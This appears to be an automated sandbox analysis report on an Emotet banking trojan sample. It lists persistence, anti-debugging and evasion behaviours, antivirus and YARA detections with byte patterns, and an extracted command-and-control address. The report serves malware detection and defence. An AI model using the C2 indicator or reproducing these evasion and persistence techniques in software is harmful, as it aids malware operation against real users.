Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F237A56_2_00F237A5
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F237A96_2_00F237A9
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F22F826_2_00F22F82
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 00404190 appears 32 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 0041DD10 appears 119 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 0041D973 appears 242 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 0041289D appears 66 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 00401530 appears 38 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 00424B8E appears 46 times
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: String function: 0041D9A6 appears 36 times
PE file contains strange resourcesShow sources
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: m5wpHJDhIl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: m5wpHJDhIl.exe, 00000000.00000002.2102390284.0000000000445000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWinDir.EXEF vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exe, 00000001.00000002.2127842166.0000000002250000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exe, 00000001.00000002.2127978991.00000000022B0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exe, 00000001.00000002.2127978991.00000000022B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exe, 00000001.00000002.2127150926.0000000000445000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWinDir.EXEF vs m5wpHJDhIl.exe
Source: m5wpHJDhIl.exeBinary or memory string: OriginalFilenameWinDir.EXEF vs m5wpHJDhIl.exe
Yara signature matchShow sources
Source: 00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.2127695275.0000000002111000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.2102869064.0000000002281000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@7/0@0/11
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041181E __EH_prolog3,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,0_2_0041181E
Contains functionality to create servicesShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_0211E138
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,6_2_00F2E138
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_02281943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_02281943
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00402B60 FindResourceA,LoadResource,SizeofResource,LockResource,CreateFileMappingW,MapViewOfFile,CharLowerA,0_2_00402B60
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0211E138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_0211E138
Creates mutexesShow sources
Source: C:\Windows\SysWOW64\wrapgroup.exeMutant created: \BaseNamedObjects\Global\IB0A8168B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IB0A8168B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MB0A8168B
PE file has an executable .text section and no other executable sectionShow sources
Source: m5wpHJDhIl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: m5wpHJDhIl.exeVirustotal: Detection: 81%
Source: m5wpHJDhIl.exeReversingLabs: Detection: 80%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-30626
Source: C:\Windows\SysWOW64\wrapgroup.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_5-2136
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\m5wpHJDhIl.exe 'C:\Users\user\Desktop\m5wpHJDhIl.exe'
Source: unknownProcess created: C:\Users\user\Desktop\m5wpHJDhIl.exe --df6ec7c8
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p
Source: unknownProcess created: C:\Windows\SysWOW64\wrapgroup.exe C:\Windows\SysWOW64\wrapgroup.exe
Source: unknownProcess created: C:\Windows\SysWOW64\wrapgroup.exe --4f0f594b
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeProcess created: C:\Users\user\Desktop\m5wpHJDhIl.exe --df6ec7c8Jump to behavior
Source: C:\Windows\SysWOW64\wrapgroup.exeProcess created: C:\Windows\SysWOW64\wrapgroup.exe --4f0f594bJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
PE file contains a mix of resources often seen in goodwareShow sources
Source: m5wpHJDhIl.exeStatic PE information: section name: RT_CURSOR
Source: m5wpHJDhIl.exeStatic PE information: section name: RT_BITMAP
Source: m5wpHJDhIl.exeStatic PE information: section name: RT_ICON
Source: m5wpHJDhIl.exeStatic PE information: section name: RT_MENU
Source: m5wpHJDhIl.exeStatic PE information: section name: RT_DIALOG
Source: m5wpHJDhIl.exeStatic PE information: section name: RT_STRING
Source: m5wpHJDhIl.exeStatic PE information: section name: RT_ACCELERATOR
Source: m5wpHJDhIl.exeStatic PE information: section name: RT_GROUP_ICON

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0042A3CB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0042A3CB
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041DA12 push ecx; ret 0_2_0041DA25
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041DD55 push ecx; ret 0_2_0041DD68
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0226FAF1 push edx; retf 0_2_0226FAF8
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0226FAD3 push edx; iretd 0_2_0226FAD4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0226FB0F push edx; retf 0_2_0226FB10
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0226FB1A push edx; retf 0_2_0226FB48
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0226FB77 push edx; iretd 0_2_0226FB84
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0226FD71 push edx; retf 0_2_0226FD80
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0226FD52 push edx; iretd 0_2_0226FD70
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0041DA12 push ecx; ret 1_2_0041DA25
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0041DD55 push ecx; ret 1_2_0041DD68
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0075FAF1 push edx; retf 1_2_0075FAF8
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0075FAD3 push edx; iretd 1_2_0075FAD4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0075FB77 push edx; iretd 1_2_0075FB84
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0075FB1A push edx; retf 1_2_0075FB48
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0075FB0F push edx; retf 1_2_0075FB10
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0075FD71 push edx; retf 1_2_0075FD80
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0075FD52 push edx; iretd 1_2_0075FD70

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\SysWOW64\wrapgroup.exeExecutable created and started: C:\Windows\SysWOW64\wrapgroup.exeJump to behavior
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exePE file moved: C:\Windows\SysWOW64\wrapgroup.exeJump to behavior

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0211E138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_0211E138

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeFile opened: C:\Windows\SysWOW64\wrapgroup.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_004051C7 IsIconic,GetWindowPlacement,GetWindowRect,0_2_004051C7
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0040D85F IsWindowVisible,IsIconic,0_2_0040D85F
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00404D01 GetParent,GetParent,IsIconic,GetParent,0_2_00404D01
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00417FD6 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_00417FD6
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_004051C7 IsIconic,GetWindowPlacement,GetWindowRect,1_2_004051C7
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0040D85F IsWindowVisible,IsIconic,1_2_0040D85F
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00404D01 GetParent,GetParent,IsIconic,GetParent,1_2_00404D01
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00417FD6 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,1_2_00417FD6
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wrapgroup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wrapgroup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wrapgroup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wrapgroup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wrapgroup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wrapgroup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\SysWOW64\wrapgroup.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-2234
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-30559
Contains functionality to enumerate running servicesShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,1_2_0211DE9C
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,6_2_00F2DE9C
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-30808
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeAPI coverage: 6.1 %
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeAPI coverage: 9.1 %
Source: C:\Windows\SysWOW64\wrapgroup.exeAPI coverage: 7.1 %
Program does not show much activity (idle)Show sources
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Checks the free space of harddrivesShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_004190B9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_004190B9
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00402560 FindFirstFileA,SendMessageA,GetFullPathNameA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,0_2_00402560
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00419C0B lstrlenA,FindFirstFileA,FindClose,0_2_00419C0B
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_004190B9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_004190B9
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00402560 FindFirstFileA,SendMessageA,GetFullPathNameA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,1_2_00402560
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00419C0B lstrlenA,FindFirstFileA,FindClose,1_2_00419C0B
Program exit pointsShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeAPI call chain: ExitProcess graph end nodegraph_0-30249
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeAPI call chain: ExitProcess graph end nodegraph_1-30149
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeAPI call chain: ExitProcess graph end nodegraph_1-30482
Source: C:\Windows\SysWOW64\wrapgroup.exeAPI call chain: ExitProcess graph end nodegraph_5-2166
Source: C:\Windows\SysWOW64\wrapgroup.exeAPI call chain: ExitProcess graph end nodegraph_6-2100
Source: C:\Windows\SysWOW64\wrapgroup.exeAPI call chain: ExitProcess graph end nodegraph_6-2109
Queries a list of all running processesShow sources
Source: C:\Windows\SysWOW64\wrapgroup.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00421687 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421687
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0042A3CB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0042A3CB
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_02261743 mov eax, dword ptr fs:[00000030h]0_2_02261743
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_02260467 mov eax, dword ptr fs:[00000030h]0_2_02260467
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_02260C0C mov eax, dword ptr fs:[00000030h]0_2_02260C0C
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_022812CD mov eax, dword ptr fs:[00000030h]0_2_022812CD
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_02281E04 mov eax, dword ptr fs:[00000030h]0_2_02281E04
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00750467 mov eax, dword ptr fs:[00000030h]1_2_00750467
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00751743 mov eax, dword ptr fs:[00000030h]1_2_00751743
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00750C0C mov eax, dword ptr fs:[00000030h]1_2_00750C0C
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_021112CD mov eax, dword ptr fs:[00000030h]1_2_021112CD
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_02111E04 mov eax, dword ptr fs:[00000030h]1_2_02111E04
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 5_2_00F112CD mov eax, dword ptr fs:[00000030h]5_2_00F112CD
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 5_2_00F11E04 mov eax, dword ptr fs:[00000030h]5_2_00F11E04
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F212CD mov eax, dword ptr fs:[00000030h]6_2_00F212CD
Source: C:\Windows\SysWOW64\wrapgroup.exeCode function: 6_2_00F21E04 mov eax, dword ptr fs:[00000030h]6_2_00F21E04
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041D789 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,0_2_0041D789
Program does not show much activity (idle)Show sources
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00425C3A SetUnhandledExceptionFilter,__encode_pointer,0_2_00425C3A
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00421687 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421687
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0041CA11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041CA11
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00425C5C __decode_pointer,SetUnhandledExceptionFilter,0_2_00425C5C
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00426C1A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00426C1A
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00425C3A SetUnhandledExceptionFilter,__encode_pointer,1_2_00425C3A
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00421687 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00421687
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_0041CA11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041CA11
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00425C5C __decode_pointer,SetUnhandledExceptionFilter,1_2_00425C5C
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 1_2_00426C1A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00426C1A

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: GetLocaleInfoA,0_2_004291D4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,0_2_0040F581
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_0042ECB2
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: GetLocaleInfoA,1_2_004291D4
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,1_2_0040F581
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,1_2_0042ECB2
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0042A5FF cpuid 0_2_0042A5FF
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\wrapgroup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00426893 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00426893
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_00423068 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_00423068
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\m5wpHJDhIl.exeCode function: 0_2_0040502E _memset,GetVersionExA,0_2_0040502E
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\wrapgroup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmp, type: MEMORY

Malware Configuration

Threatname: Emotet

{"C2 list": ["120.150.246.241/K9czcmT3hzV"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
m5wpHJDhIl.exe82%VirustotalBrowse
m5wpHJDhIl.exe81%ReversingLabsWin32.Trojan.Emotet
m5wpHJDhIl.exe100%AviraTR/AD.Emotet.vzbjd

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://120.150.246.241/K9czcmT3hzV0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
    • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
    • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
    00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
      • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
      • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
      00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
        • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B F2 00 85 C0
        • 0x5066:$snippet6: 33 C0 21 05 0C 3C F2 00 A3 08 3C F2 00 39 05 60 03 F2 00 74 18 40 A3 08 3C F2 00 83 3C C5 60 03 ...
